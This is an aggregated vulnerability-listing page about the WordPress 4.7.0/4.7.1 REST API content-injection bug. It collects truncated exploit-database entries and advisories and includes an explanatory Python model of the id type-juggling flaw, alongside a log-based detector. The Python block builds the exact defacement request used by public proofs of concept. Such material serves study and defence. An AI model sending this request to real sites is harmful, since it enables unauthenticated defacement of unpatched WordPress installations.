WordPress REST API Content Injection
This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress REST API...
WordPress REST API Plugin Content Injection Vulnerability
WordPress is a free and open source blogging software and content management system that uses PHP and MySQL as its platform. A content injection vulnerability exists in the WordPress REST API plugin. A remote attacker can exploit the vulnerability to elevate privileges or perform content injectio...
WordPress Silently Fixed Privilege Escalation Vulnerability in 4.7.2 Update
WordPress silently fixed a serious content injection vulnerability when it pushed out its latest security release, 4.7.2, last week. Sucuri, the firm that found the vulnerability, disclosed it Wednesday and said that if exploited, it could have let an attacker modify the content of any WordPress...
WordPress REST API Content Injection
A content injection vulnerability exists in WordPress REST API. A remote attacker may exploit this vulnerability by sending a malicious request to the server. Successful exploitation would allow an attacker to inject and change content...
WordPress 4.7.0 / 4.7.1 REST API Privilege Escalation Exploit
WordPress versions 4.7.0 and 4.7.1 REST API post privilege escalation and defacement exploit. #!/usr/bin/env python ''' WordPress 4.7.0-4.7.1 REST API Post privilege escalation / defacement exploit @dustyfresh Date: 02-01-2017 Original vuln disclosed by Sucuri's research team Reference:...
WordPress 4.7.0 / 4.7.1 - Unauthenticated Content Injection (PoC) Exploit
Exploit for php platform in category web applications Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC Date: 2017-02-02 Exploit Author: @leonjza Vendor Homepage: https://wordpress.org/ Software Link: https://wordpress.org/wordpress-4.7.zip Version: Wordpress 4.7.0/4.7.1...
WordPress 4.7.0 / 4.7.1 - Unauthenticated Content Injection Arbitrary Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: WP Content Injection Shell Exploit Date: 31 Jan 2017 Exploit Author: Harsh Jaiswal Vendor Homepage: http://wordpress.org Version: Wordpress 4.7 - 4.7.1 Patched in 4.7.2 Tested on: BackBox Ubuntu Linux Based on:...
WordPress REST API content injection vulnerability
1. Vulnerability information: WordPress is a free and open-source blogging platform and content management system built on PHP and MySQL. Starting with version 4.7.0 the REST API plugin's functionality was merged into WordPress core, which also introduced some security problems. Recently a vulnerability in the REST API affecting WordPress 4.7.0 and 4.7.1 was disclosed; it lets all of a site's posts be viewed, modified, deleted, and even new posts created, without authentication, so the impact is severe. 2. Affected versions: WordPress 4.7.0, WordPress 4.7.1 3. Reproduction environment: Apache 2.4, PHP 7.0, WordPress 4.7.1 4. Reproduction steps:...
WordPress 4.7.0/4.7.1 - Content Injection (Ruby)
WordPress 4.7.0/4.7.1 - Content Injection Ruby Exploit Title: WP Content Injection Date: 31 Jan 2017 Exploit Author: Harsh Jaiswal Vendor Homepage: http://wordpress.org Version: Wordpress 4.7 - 4.7.1 Patched in 4.7.2 Tested on: BackBox Ubuntu Linux Based on...
WordPress 4.7.0 / 4.7.1 Content Injection / Code Execution
Exploit Title: WP Content Injection Shell Exploit Date: 31 Jan 2017 Exploit Author: Harsh Jaiswal Vendor Homepage: http://wordpress.org Version: Wordpress 4.7 - 4.7.1 Patched in 4.7.2 Tested on: BackBox Ubuntu Linux Based on:...
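The entries above all describe the same bug: the permission check in the 4.7.0/4.7.1 posts controller resolves `$request['id']` with a strict numeric test, while the update step casts it with `(int)`, so an id such as `1abc` is "not found" by the check and then truncated to post 1 by the update; the query-string `id` is accepted because the REST server reads GET parameters before route-matched URL parameters. The following Python block is an added example and is not code from WordPress or from any of the exploit authors listed here: it emulates the two PHP coercions, models the vulnerable and the hardened update flow, builds the request shape the public PoCs send, and runs a simple access-log check. The site state, `fresh_posts`, `SAMPLE_LOG`, the `blog.example` host and the exact 4.7.2 fix shape are constructed or assumed for illustration.

```python
"""Model of the WordPress 4.7.0/4.7.1 REST API id type-juggling bug.
Added example, not WordPress or exploit-author code. PHP coercion is
emulated in Python; site state and log lines are constructed here."""
import json
import re
from urllib.parse import parse_qs, urlencode


def php_is_numeric(s: str) -> bool:
    """Emulates PHP is_numeric(): whole string must be a decimal literal.
    '1abc' -> False (assumption: PHP 7 rules, leading whitespace allowed)."""
    return re.fullmatch(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?", s) is not None


def php_int_cast(s: str) -> int:
    """Emulates PHP (int) on a string: leading integer prefix, else 0. '1abc' -> 1."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def fresh_posts() -> dict:
    """Constructed site state: a single post with id 1."""
    return {1: {"title": "Hello world!", "content": "Welcome to WordPress."}}


def vulnerable_update(posts: dict, request_id: str, new_content: str, user_can_edit: bool) -> str:
    """Models the 4.7.0/4.7.1 update path, where two different id rules are used."""
    # update_item_permissions_check(): get_post($request['id']) refuses a
    # non-numeric id, so $post is falsy and the capability test never runs.
    post = posts.get(php_int_cast(request_id)) if php_is_numeric(request_id) else None
    if post is not None and not user_can_edit:
        return "403 rest_cannot_edit"
    # update_item(): $id = (int) $request['id'] truncates '1abc' to 1 and
    # writes to the real post.
    pid = php_int_cast(request_id)
    if pid not in posts:
        return "404 rest_post_invalid_id"
    posts[pid]["content"] = new_content
    return "200 updated"


def fixed_update(posts: dict, request_id: str, new_content: str, user_can_edit: bool) -> str:
    """Models the 4.7.2 approach (assumption: simplified): resolve the post
    once, with one rule, and run the capability check against that post."""
    pid = php_int_cast(request_id)
    if pid <= 0 or pid not in posts:
        return "404 rest_post_invalid_id"
    if not user_can_edit:
        return "403 rest_cannot_edit"
    posts[pid]["content"] = new_content
    return "200 updated"


def build_poc_request(base_url: str, post_id: int, new_content: str) -> tuple:
    """Shape of the public PoC request: the path id satisfies the route
    regex (?P<id>[\\d]+), the query-string id overrides it (assumption:
    4.7 reads GET params before URL params)."""
    path = f"/wp-json/wp/v2/posts/{post_id}?" + urlencode({"id": f"{post_id}abc"})
    body = json.dumps({"content": new_content})
    return ("POST", base_url.rstrip("/") + path, {"Content-Type": "application/json"}, body)


# Hypothetical access-log format (constructed, Apache combined style).
LOG_RE = re.compile(r'"(?P<method>POST|PUT|PATCH) (?P<path>/wp-json/wp/v2/posts/\d+)\?(?P<qs>[^ "]*)')


def detect_juggled_ids(log_lines: list) -> list:
    """Flags write requests to the posts endpoint whose query-string id is
    not a plain positive integer, the shape that bypasses the check."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        for value in parse_qs(m.group("qs")).get("id", []):
            if not re.fullmatch(r"[1-9]\d*", value):
                hits.append((m.group("method"), m.group("path"), value))
    return hits


SAMPLE_LOG = [  # constructed lines
    '203.0.113.5 - - [01/Feb/2017:10:00:01 +0000] "GET /wp-json/wp/v2/posts/1 HTTP/1.1" 200 812',
    '203.0.113.5 - - [01/Feb/2017:10:00:02 +0000] "POST /wp-json/wp/v2/posts/1?id=1abc HTTP/1.1" 200 901',
    '198.51.100.7 - - [01/Feb/2017:10:00:03 +0000] "POST /wp-json/wp/v2/posts/1?id=1 HTTP/1.1" 401 77',
]

if __name__ == "__main__":
    print(vulnerable_update(fresh_posts(), "1abc", "defaced", user_can_edit=False))
    print(fixed_update(fresh_posts(), "1abc", "defaced", user_can_edit=False))
    print(build_poc_request("https://blog.example", 1, "defaced"))
    print(detect_juggled_ids(SAMPLE_LOG))
```

The log check only sees the query-string variant; because JSON body parameters are read even before GET parameters, an `id` smuggled in the request body leaves nothing in a standard access log, so treat a clean log as weak evidence and rely on the version check (4.7.2 or later) instead.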
CVE-2016-6044
IBM Tivoli Storage Manager Operations Center could allow an authenticated attacker to enable or disable the application's REST API, which may let the attacker violate security policy...
Design/Logic Flaw
IBM Tivoli Storage Manager Operations Center could allow an authenticated attacker to enable or disable the application's REST API, which may let the attacker violate security policy...
CVE-2016-6044
Summary: CVE-2016-6044 affects IBM Tivoli Storage Manager Operations Center and allows an authenticated user to enable/disable the REST API, potentially violating security policy. Affected versions: 7.1.0.000–7.1.7.000 and 6.4.1.000–6.4.2.400. Root cause/impact: REST API control vulnerability cou...
WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
...
WordPress < 4.7.2 Multiple Vulnerabilities
According to its self-reported version number, the WordPress application running on the remote web server is prior to 4.7.2. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the class-wp-press-this.php script due to a failure to properly...
FreeBSD : wordpress -- multiple vulnerabilities (14ea4458-e5cd-11e6-b56d-38d547003487)
Aaron D. Campbell reports: WordPress versions 4.7.1 and earlier are affected by three security issues: - The user interface for assigning taxonomy terms in Press This is shown to users who do not have permissions to use it. - WP_Query is vulnerable to SQL injection (SQLi) when passing unsafe dat...
wordpress -- multiple vulnerabilities
Aaron D. Campbell reports: WordPress versions 4.7.1 and earlier are affected by three security issues: The user interface for assigning taxonomy terms in Press This is shown to users who do not have permissions to use it. WP_Query is vulnerable to SQL injection (SQLi) when passing unsafe data...
Splunk Enterprise HTTP Request Injection Vulnerability (SP-CAAAPSR)
Splunk Enterprise is prone to an HTTP request injection vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...
[BSA-114] Security update for wordpress
Craig Small uploaded new packages for wordpress which fixed the following security problems: CVE-2016-10066, CVE-2016-10045 Potential remote command execution (RCE) in PHPMailer CVE-2017-5488 Authenticated cross-site scripting (XSS) in update-core.php CVE-2017-5490 Stored cross-site...